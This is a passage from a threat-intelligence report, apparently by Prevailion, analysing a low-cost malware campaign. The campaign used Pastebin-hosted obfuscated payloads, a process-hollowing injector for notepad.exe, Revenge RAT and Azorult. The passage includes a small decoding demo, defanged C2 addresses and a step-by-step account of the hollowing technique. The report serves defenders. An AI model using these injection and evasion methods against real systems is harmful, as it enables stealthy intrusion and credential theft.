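DEMO_SCRIPT = "Write-Output 'stand-in for the loader'"
DEMO_PAYLOAD = b"MZ" + bytes(range(10))

if __name__ == "__main__":
    print(decode_charcode_paste(obfuscate_charcode(DEMO_SCRIPT)))
    blob = obfuscate_payload(DEMO_PAYLOAD, "!#@")
    print(blob[:40], "->", looks_like_pe(decode_payload_paste(blob)))
```

Checking for the MZ header after decoding is the quick way to confirm that a paste really carries the injector DLL or RAT rather than another script layer.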

Step 6 - Analysis of the Process Hollower and Trojan

The .NET DLL sample associated with this particular campaign was obfuscated using an open-source project called “ConfuserEx” from GitHub. Thankfully, “de4dot” is another available open-source project, which can be used to deobfuscate the samples.

This DLL serves as a process-hollowing injector for notepad.exe, referenced in step 5 above. It receives the byte array containing the PE data from the PowerShell script. It looks for notepad.exe in windows\syswow64 and then calls “MyVictim.tickleme”, which zeros the PE headers in the buffer and calls VOVO.FUN.

VOVO.FUN then launches notepad.exe, unmaps the existing section, allocates a new buffer in the notepad process, writes the payload into the process, and resumes the thread. This allowed the threat actors to never write the malware to disk. The actors maintained persistence via the scheduled tasks, which would periodically fetch the injector and RAT and hollow out the memory of a process that points to a valid image on disk.


Screenshot of the process hollowing dll

In an operation that occurred on September 9th, 2019, the threat actors deployed Revenge Rat. 
 
This particular agent communicated with a duckdns domain, hxxp://speeddfox[.]duckdns[.]org, and it generated a mutex string named "WindowsUpdateSysten32". These characteristics, such as the use of Revenge Rat and the mutex string, allowed us to draw parallels to a campaign previously reported by other security firms, which they associated with the “Gorgon Group”.

Screenshot of the Revenge Rat’s C2 and MUTEX string

Approximately one week later, on September 15th, we observed an evolution of TTPs, using Azorult, in lieu of Revenge Rat. Azorult was a well-known trojan, and this particular variant was written in Delphi. As noted by other security researchers, Azorult has been available for sale on Russian forums at prices ranging up to $100US.

While this trojan may be older, it was still highly effective. Most of its functionality was geared towards harvesting credentials found on the victim machine: email accounts, messenger applications (e.g., Pidgin, Psi+, Telegram), web cookies, browser history, and cryptocurrency wallets.

Functionality to harvest cryptocurrency wallets 

It also had traditional trojan functionality, such as host-based enumeration and the ability to upload and download files, as well as take screenshots. Once the trojan had obtained the information, it would communicate with a hard-coded IP address; two such C2s were hxxp://216.170.126[.]146/2ky/index.php and hxxp://23.249.163.135/index.php. We assess that these threat actors likely configured their C2s using another GitHub project.


Pastebin Insights 

A review of the publicly available Pastebin metadata provided a couple of interesting insights into this campaign.

The threat actors’ use of third-party websites, such as Bitly, Blogspot, and Pastebin, was likely done to evade detection, as those sites would have been less likely to arouse suspicion from network defenders. However, websites such as Bitly and Pastebin keep metrics on how many times a given link has been visited. We were able to determine who created this particular Pastebin post and how many times it had been viewed.

For example, we observed that the URL that hosted the Revenge Rat sample had been viewed over 3300 times. This suggests that as many as 3300 machines retrieved the payload in this campaign. However, because the threat actors used a known trojan, the number of machines actually compromised could be much lower, as many of them may have had antivirus products in place.

 
Pastebin URL ending in “LJV1Hn3g” which decodes to Revenge Rat


Pastebin URL ending in “xAnP1Xjc” which decodes to Azorult Rat

We noticed that, six days later, the same Pastebin creator “hagga” created a new post that decoded to the aforementioned Azorult trojan.

That post had a little over 1000 views. If these two operations are representative of a standard week, we surmise that these threat actors potentially interacted with approximately 2000 machines per week.

While this number likely does not reflect the number of actively compromised machines by this threat actor, it does provide us with a snapshot to better understand the breadth of their operations.

Upon further inspection of the Pastebin creator “hagga”, it appears that this Pastebin account was created on December 3rd, 2018. Thus, we suspect this activity has been occurring since that time.

We also discovered one interesting Pastebin post title: “MasterManabots-all-bots”. From this, and the reference to “Mana” in the blogspot hostname, we suspect the actors refer to this campaign as the “MasterMana Botnet”.

Screenshot of the Pastebin post ending in “cUcUDfLf” called “Mastermanbots-all-bots”


Conclusion 


We found two aspects of this campaign particularly interesting:

  • The cost for the threat actors to deploy and maintain the campaign was virtually nonexistent.
  • The campaign showed a very specific level of sophistication, tailored intentionally to evade detection.

Regarding the low monetary cost associated with this campaign, we observed that the threat actors leaned heavily on various third-party services.

For example, they sent malicious documents using free web mail accounts. They then could have used an open-source project to generate a DDE payload or macro and had the macro reach out to a Bitly link. This link then resolved to a free Blogspot site, hosted by Google, which redirected to various Pastebin sites. Finally, they used an older trojan that likely cost approximately $100. Thus, the only real cost associated with this particular campaign appears to be that of leasing the VPSs.

Based on the level of sophistication displayed in this campaign, we believe that the threat actors struck a sweet spot. The longevity of this campaign can be partially attributed to the threat actors’ ability to avoid using popular commodity malware, such as Emotet. Simultaneously, they avoided the use of (and subsequently, the potential burning of) zero-day exploits and custom backdoors. We speculate that this helped them obtain a higher return on investment, since they weren’t spending significant resources on tools and exploits.

This campaign’s threat actors saw an opportunity and appear to have carved out a nice niche for themselves.

We suspect that this particular threat actor is likely to continue operations, as previous public reporting has not deterred them. We therefore wanted to highlight their new modus operandi so that network defenders may more easily identify their operations.


About Prevailion

Prevailion is a compromise intelligence company, transforming the way organizations approach risk mitigation and business decision-making. Through next-level tailored intelligence and a zero-touch platform, Prevailion provides confirmed evidence of compromise for customers and their partner ecosystems.

To learn more about Prevailion, visit prevailion.com.


Indicators of Compromise

Campaign 1 - Revenge Rat (September 9th)


Campaign 2 - Azorult (15 September)


Campaign 3 - Azorult (24 September)


Emails (Sha256 Hashes)


Trojanized Documents


Bitly URLs


.NET DLL used for Process Hollowing


Revenge RAT


Delphi version of Azorult RAT


Command and Control Nodes


